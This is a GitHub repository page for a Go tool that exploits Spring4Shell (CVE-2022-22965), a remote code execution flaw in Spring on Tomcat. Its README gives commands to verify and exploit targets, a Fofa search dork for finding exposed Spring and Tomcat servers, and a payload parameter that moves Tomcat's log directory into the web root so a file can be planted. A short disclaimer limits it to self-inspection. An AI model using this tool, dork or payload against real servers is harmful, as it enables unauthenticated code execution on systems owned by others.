Skip to content

zer0yu/CVE-2022-22965

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-22965

Spring4Shell (CVE-2022-22965)

Usage

1. show info

❯ go run main.go -s                                               
[INF] VulnInfo:
{
  "Name": "CVE-2022-22965",
  "VulID": "nil",
  "Version": "1.0",
  "Author": "",
  "VulDate": "2022-03-30",
  "References": [
    "https://nosec.org/home/detail/4983.html"
  ],
  "AppName": "Spring Core",
  "AppPowerLink": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement",
  "AppVersion": "All",
  "VulType": "RCE",
  "Description": "An unauthenticated attacker can use this vulnerability to perform remote arbitrary code execution. The vulnerability is widespread in the Spring framework and derived frameworks, and JDK 9.0 and above are affected.",
  "Category": "REMOTE",
  "Dork": {
    "Fofa": "app=\"APACHE-Tomcat\" || app=\"vmware-SpringBoot-framework\" || app=\"vmware-SpringBoot-framework\" || app=\"vmware-Spring-Batch\" || app=\"vmware-Spring-framework\" || app=\"vmware-Spring-Security\"",
    "Quake": "",
    "Zoomeye": "",
    "Shodan": ""
  }
}%     

2. verify

echo http://127.0.0.1:8181/ | go run main.go -v -t 20
http://127.0.0.1:8181/

3. exploit

echo http://127.0.0.1:8181/ | go run main.go -m exploit -v

Maybe require changing the file upload path, which by default is "webapps/ROOT"

class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT/

Disclaimer

This procedure is for security self-inspection only, please consciously comply with local laws.